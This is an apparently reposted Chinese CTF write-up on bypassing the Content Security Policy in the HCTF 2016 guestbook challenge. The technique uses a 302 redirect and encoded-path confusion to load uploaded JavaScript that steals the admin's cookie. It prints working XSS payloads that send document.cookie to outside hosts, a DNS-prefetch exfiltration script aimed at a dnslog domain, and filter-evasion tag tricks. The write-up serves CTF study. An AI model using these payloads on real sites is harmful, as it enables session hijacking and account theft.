hctf2016_302跳轉繞csp---總結

時間  2021-01-30
標籤 php html web ajax chrome 跨域 瀏覽器 服務器 cookie app 欄目 PHP 简体版
原文   原文鏈接

頁面目錄以下:php

register.php註冊頁面。html

user.php可發送消息給其餘用戶。web

profile.php可配置參數添加用戶頭像(加載eval js文件)。ajax

static存在redirect.php重定向頁面。chrome

看下csp規則:跨域

default-src 'self'; script-src http://www.123.com/hctf2016_secret_area/static/ 'sha256-n+kMAVS5Xj7r/dvV9ZxAbEX6uEmK+uen+HZXbLhVsVA=' 'sha256-2zDCsAh4JN1o1lpARla6ieQ5KBrjrGpn0OAjeJ1V9kg=' 'sha256-SQQX1KpZM+ueZs+PyglurgqnV7jC8sJkUMsG9KkaFwQ=' 'sha256-JXk13NkH4FW9/ArNuoVR9yRcBH7qGllqf1g5RnJKUVg=' 'sha256-NL8WDWAX7GSifPUosXlt/TUI6H8JU0JlK7ACpDzRVUc=' 'sha256-CCZL85Vslsr/bWQYD45FX+dc7bTfBxfNmJtlmZYFxH4=' 'sha256-2Y8kG4IxBmLRnD13Ne2JV/V106nMhUqzbbVcOdxUH8I=' 'sha256-euY7jS9jMj42KXiApLBMYPZwZ6o97F7vcN8HjBFLOTQ=' 'sha256-V6Bq3u346wy1l0rOIp59A6RSX5gmAiSK40bp5JNrbnw='; font-src http://www.123.com/hctf2016_secret_area/static/ fonts.gstatic.com; style-src 'self' 'unsafe-inline'; img-src 'self'

一、script沒有開啓unsafe-inline,也就是說不容許內聯腳本(不能直接寫js代碼注入)
二、script只容許static目錄,但這個目錄下內容不可控
三、style-src開啓了unsafe-inline並且是self
四、default-src爲self,也就是站內請求都是被許可的瀏覽器

假如script開啓了unsafe-inline的話,能夠經過構造新開頁面或者跳轉來解決域限制,因爲js能夠任意構造,因此這裏也就經過特別的方式繞過了本來的限制。這個題目就是hctf2016 guestbook的繞過csp思路服務器

<scrscriptipt>window.open("​http://xxxx:8080/cookie.asp?msg="+document.body​)</scrscriptipt>
<scrscriptipt>window.locatioonn.href%3d"http%3a//www.example.com/xss/write.php%3fdomain%3d"%2bescape(document.cookie)%3b</sscriptcript>
<scrscriptipt>var a=document.createElement("a");a.href='http://xss.com/?cookie='+escape(document.cookie);a.click();</sscriptcript>

攻擊目標獲:取admin的cookie。cookie

攻擊思路:defalt-src是self,一、表示即便拿到cookie也只能在域內傳送,因此只能將cookie傳回註冊用戶afanti.user.php存在常規xss可是unsafe-inline不能寫入js代碼。要是引入js代碼,引入的目錄在/hctf2016_secret_area/static/這裏不可控無法傳入js,/hctf2016_secret_area/upload/這個目錄咱們可控(經過上傳頭像寫入代碼),可是這個目錄沒有在script-src內,因此經過重定向繞過csp.到咱們可控的目錄/hctf2016_secret_area/upload/app

二、能夠拿到cookie向域外傳送:由於/hctf2016_secret_area/upload/可控,在上傳頭像中寫入打開新頁面來傳遞cookie.

三、<script src="http://www.123.com/hctf2016_secret_area/static/..%2f..%2fupload/76eb335a573b564c6a02d2debda70402"></script>相似rpo繞過csp.

主要利用瀏覽器和服務器解析不一致繞過csp,瀏覽器會加載static下的..%2f..%2fupload/76eb335a573b564c6a02d2debda70402文件,這是沒有跨域的。可是服務器會把%2f解析,跳倆個目錄返回http://www.123.com/hctf2016_secret_area/upload/76eb335a573b564c6a02d2debda70402致使繞過csp,/upload咱們上傳內容可控。

攻擊流程:

1.註冊afanti用戶並上傳頭像,攻擊代碼會將admin的cookie發送到afanti用戶下

說下把script標籤去掉,截圖中沒去,要不會報錯

二、給admin發送以下消息

<scscriptript src="http://www.123.com/hctf2016_secret_area/static/redirect.php?u=/hctf2016_secret_area/upload/76eb335a573b564c6a02d2debda70402"></scriscriptpt>

3.當admin用戶訪問時,加載js的時候,會經過redirect.php頁面加載 /hctf2016_secret_area/upload/76eb335a573b564c6a02d2debda70402這個js文件。

將admin的cookie發送給afanti用戶。

4.afanti用戶訪問獲得admin 的cookie

4.只是將上傳頭像內容改一下,把cookie傳到外域測試。當管理員打開頁面時,會打開新的頁面並把cookie帶出來。

 

 

測試:xhr設置到域外被default-src攔截。

link的prefetch被chrome的default-src被攔截:

link的preload也遵循csp規則,當as屬性設置爲image時,被csp的image-src攔截,假如設置的屬性能夠傳遞到外域,eg:img-src:*,就能夠傳遞到外域了:

 

link的prerender在chrome經過測試,可是很迷觸發方式不太清楚:

link中的preconnect(dns通道)最好用,能夠chrome和firefox都能繞csp:

dc = document.cookie;
dcl = dc.split(";"); n0 = document.getElementsByTagName("HEAD")[0]; for (var i=0; i<dcl.length;i++) { console.log(dcl[i]); n0.innerHTML = n0.innerHTML + "<link rel=\"preconnect\" href=\"//" + escape(dcl[i].replace(/\//g, "-")).replace(/%/g, "_") + '.' + location.hostname.split(".").join("") +  ".on1sw1.ceye.io\">"; console.log(n0.innerHTML); }

打到以下cookie:

cookie格式:

admin=hctf2o16com30nag0gog0; path=/ PHPSESSID=fu6p3nm7fsdjo31vien84n3pr3; path=/ 
dnslog上的cookie: _20admin_3dhctf2o16com30nag0gog0.www123com.xxxx.ceye.io phpsessid_3dfu6p3nm7fsdjo31vien84n3pr3.www123com.xxxx.ceye.io _20admin_3dhctf2o16com30nag0gog0.www123com.xxxx.ceye.io phpsessid_3dfu6p3nm7fsdjo31vien84n3pr3.www123com.xxxx.ceye.io 

最後,不是全部的頁面都可以被預加載,當資源類型以下時:

URL中包含下載資源 頁面中包含音頻、視頻 POST、PUT和DELET操做的ajax請求 HTTP認證 HTTPS頁面 含惡意軟件的頁面 彈窗頁面 佔用資源不少的頁面 打開了chrome developer tools開發工具

總結:

經過302跳轉繞過js,跳到咱們可控的目錄來執行js。

一、有跳轉目錄(登陸界面)

二、存在xss

三、可控目錄咱們能夠上傳圖像等文件

---------------------------------------------------------------------------------------

若是沒有unsafe-inline的助攻,並且都是self的話,這樣也只能尋求站內的上傳點。

如下不算是繞過csp,屬於繞過上傳的內容檢測

一、上傳的swf內容

1.CWS <script>var xml = new XMLHttpRequest(); xml.open('POST', 'http://xss.xxxxx.cc', true); 
xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); 
xml.send('cookie='+document.cookie); </script>
<link rel='import' href='/upload/1.cws'>

二、上傳jpeg帶有js的jpg圖片。

https://lorexxar.cn/2016/12/07/polyglot-JPEGs-bypass-csp/

三、上傳gif或者音頻文件webp

https://mp.weixin.qq.com/s/ljBB5jStB7fcJq4cgdWnnw

其餘類型的之後在總結。

參考文章:

https://lorexxar.cn/2016/11/30/hctf2016-xss/

https://lorexxar.cn/2016/10/31/csp-then2/

http://www.cnblogs.com/iamstudy/articles/bypass_csp_study.html

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程